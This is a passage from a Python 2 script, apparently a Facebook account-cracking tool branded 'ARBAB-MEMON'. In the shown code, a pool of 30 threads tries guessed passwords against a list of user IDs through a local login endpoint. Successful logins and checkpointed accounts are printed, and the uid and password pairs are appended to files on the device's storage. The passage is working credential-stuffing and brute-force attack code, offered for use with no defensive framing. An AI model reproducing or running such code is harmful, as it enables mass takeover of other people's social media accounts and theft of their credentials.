                                    cps.append(uid + pass6)
                                else:
                                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass7, headers=header).text
                                    q = json.loads(data)
                                    if 'loc' in q:
                                        print '\x1b[1;32m(ARBAB-OK) ' + uid + ' | ' + pass7 + '\x1b[0;97m'
                                        ok = open('/sdcard/ids/ARBAB-MEMON-OK.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid + pass7)
                                    elif 'www.facebook.com' in q['error']:
                                        print '\x1b[0;36m(ARBAB-CP) ' + uid + ' | ' + pass7
                                        cp = open('checkpoint.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid + pass7)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' The process has completed'
    print ' Total ARBAB-MEMON Ok/Cp:' + str(len(oks)) + '/' + str(len(cps))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press enter to back')
    choice()


if __name__ == '__main__':
    reg()
